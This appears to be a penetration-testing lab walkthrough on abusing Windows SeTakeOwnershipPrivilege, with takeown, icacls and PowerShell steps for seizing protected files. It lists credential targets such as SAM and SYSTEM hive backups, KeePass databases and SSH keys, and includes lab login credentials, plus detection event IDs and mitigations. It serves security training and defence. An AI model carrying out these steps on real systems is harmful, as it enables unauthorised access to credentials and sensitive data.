SeTakeOwnershipPrivilege grants users the ability to take ownership of any "securable object" including NTFS files/folders, registry keys, services, processes, and Active Directory objects. This privilege assigns WRITE_OWNER rights, allowing modification of object security descriptors to change ownership.
- File/folder ownership takeover on NTFS systems
- Registry key ownership modification
- Service ownership changes
- Process ownership manipulation
- Active Directory object ownership control
# Group Policy location:
Computer Configuration → Windows Settings → Security Settings → Local Policies → User Rights Assignment
"Take ownership of files or other objects"Common Assignment Scenarios:
- Administrators - assigned by default
- Service accounts - backup jobs, VSS snapshots
- Specialized roles - often combined with SeBackupPrivilege, SeRestorePrivilege
- GPO abuse victims - via SharpGPOAbuse attacks
# Check current privileges
whoami /priv
# Expected output:
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled# Import privilege enablement script
Import-Module .\Enable-Privilege.ps1
.\EnableAllTokenPrivs.ps1
# Verify activation
whoami /priv
# Expected result:
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled# Use native Windows APIs to enable privilege
# Requires elevated PowerShell context# Web application configs
c:\inetpub\wwwroot\web.config
# Registry backups
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
# System event logs
%WINDIR%\system32\config\SecEvent.Evt
# Registry hive backups
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav# Common password files
passwords.*
pass.*
creds.*
credential.*
# Database files
*.kdbx (KeePass databases)
*.db
*.sqlite
# Document files
*.docx, *.xlsx, *.pdf (may contain credentials)# Virtual machine files
*.vhd, *.vhdx, *.vmdk
# Certificate files
*.pfx, *.p12
# SSH keys
id_rsa, id_ed25519
# Configuration scripts
*.ps1, *.bat, *.vbs# Examine target file details
Get-ChildItem -Path 'C:\TakeOwn\flag.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={(Get-Acl $_.FullName).Owner}}
# Check directory ownership if file owner hidden
cmd /c dir /q 'C:\Department Shares\Private\IT'# Take ownership using takeown utility
takeown /f 'C:\Department Shares\Private\IT\cred.txt'
# Expected output:
SUCCESS: The file (or folder): "C:\Department Shares\Private\IT\cred.txt" now owned by user "WINLPE-SRV01\htb-student"# Confirm ownership change
Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | Select name,directory,@{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}
# Expected result:
Name Directory Owner
---- --------- -----
cred.txt C:\Department Shares\Private\IT WINLPE-SRV01\htb-student# Test file access first
cat 'C:\Department Shares\Private\IT\cred.txt'
# May still result in: Access to the path is denied
# Grant full permissions using icacls
icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F
# Expected output:
processed file: C:\Department Shares\Private\IT\cred.txt
Successfully processed 1 files; Failed processing 0 files# Read file contents
cat 'C:\Department Shares\Private\IT\cred.txt'
# Sample output:
NIX01 admin
root:n1X_p0wer_us3er!- Target:
10.129.43.43(ACADEMY-WINLPE-SRV01) - Credentials:
htb-student:HTB_@cademy_stdnt! - Access Method: RDP
- Objective: Leverage SeTakeOwnershipPrivilege over
C:\TakeOwn\flag.txt
# Connect via RDP
xfreerdp /v:10.129.43.43 /u:htb-student /p:'HTB_@cademy_stdnt!'# Open elevated PowerShell (Run as Administrator)
# Enter htb-student credentials when prompted
PS C:\> whoami /priv
# Locate SeTakeOwnershipPrivilege in output:
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled# Download/locate Enable-Privilege.ps1 script
# If not available, use manual method or download from GitHub
# Enable all token privileges
Import-Module .\Enable-Privilege.ps1
.\EnableAllTokenPrivs.ps1
# Verify activation
PS C:\> whoami /priv
# Confirm SeTakeOwnershipPrivilege shows as "Enabled"# Examine target file
Get-ChildItem -Path 'C:\TakeOwn\flag.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={(Get-Acl $_.FullName).Owner}}
# Check directory structure
cmd /c dir /q 'C:\TakeOwn\'# Take ownership of flag.txt
takeown /f 'C:\TakeOwn\flag.txt'
# Expected success message:
SUCCESS: The file (or folder): "C:\TakeOwn\flag.txt" now owned by user "WINLPE-SRV01\htb-student"# Grant full permissions to current user
icacls 'C:\TakeOwn\flag.txt' /grant htb-student:F
# Verify permissions granted:
processed file: C:\TakeOwn\flag.txt
Successfully processed 1 files; Failed processing 0 files# Read flag contents
cat 'C:\TakeOwn\flag.txt'
# OR
Get-Content 'C:\TakeOwn\flag.txt'
# Submit the flag content found in the file# Using Get-Acl/Set-Acl for more granular control
$acl = Get-Acl 'C:\TakeOwn\flag.txt'
$acl.SetOwner([System.Security.Principal.WindowsIdentity]::GetCurrent().User)
Set-Acl -Path 'C:\TakeOwn\flag.txt' -AclObject $acl# Take ownership of registry keys (if applicable)
takeown /f "HKLM\SOFTWARE\TargetKey" /r# HIGH RISK ACTIVITIES:
- Live web.config file modification
- Critical system file ownership changes
- Deep directory structure modifications
- Service configuration file changes# DIFFICULT TO REVERT:
- Nested subdirectory permission changes
- Service account ownership restoration
- Complex ACL structure reconstruction# BEST PRACTICES:
- Document all ownership changes
- Attempt permission reversion
- Alert client to irreversible changes
- Include modifications in report appendix# Event IDs to monitor:
Event ID 4670 - Object permissions changed
Event ID 4657 - Registry value modified
Event ID 4663 - Access attempt to object
Event ID 4656 - Handle to object requested# Suspicious activities:
- takeown.exe execution with critical files
- icacls.exe permission modifications
- Unusual file access patterns
- PowerShell privilege modification scripts# Registry changes to watch:
HKLM\SYSTEM\CurrentControlSet\Services (service ownership)
HKLM\SOFTWARE (application settings)
HKCU (user-specific changes)# Remove SeTakeOwnershipPrivilege from:
- Non-essential service accounts
- Standard user accounts
- Development accounts in production
- Third-party application accounts# Implement protections:
- NTFS permissions auditing
- File integrity monitoring (FIM)
- Protected directories with strict ACLs
- Regular permission reviews# Deploy monitoring for:
- Ownership change events
- Permission modification alerts
- Critical file access attempts
- Privilege escalation indicators- User account with SeTakeOwnershipPrivilege assigned
- Elevated shell (Run as Administrator)
- Privilege enablement capability (scripts/tools)
- Target file identification (high-value assets)
- Verify privilege (
whoami /priv) - Enable privilege (Enable-Privilege.ps1 or manual)
- Identify target (sensitive files/directories)
- Take ownership (
takeown /f [target]) - Modify ACL (
icacls [target] /grant user:F) - Access content (read/copy sensitive data)
- Document changes (ownership modifications)
- Attempt reversion (restore original permissions)
- Extract data (credentials, configurations)
- Report modifications (client notification)
- Web.config files (application credentials)
- Registry backups (SAM, SYSTEM, SECURITY)
- Password files (*.txt, *.xlsx containing creds)
- Database files (KeePass *.kdbx)
- Certificate stores (*.pfx files)
- SeTakeOwnershipPrivilege enables ownership takeover of any securable object
- File system attacks are primary use case for privilege escalation
- ACL modification required after ownership change for access
- Destructive potential requires careful consideration before execution
- Service accounts commonly have this privilege for backup operations
- GPO abuse can grant privilege to controlled accounts
- Detection possible through file system event monitoring
SeTakeOwnershipPrivilege exploitation provides powerful file system access but should be used with extreme caution due to its potentially destructive nature.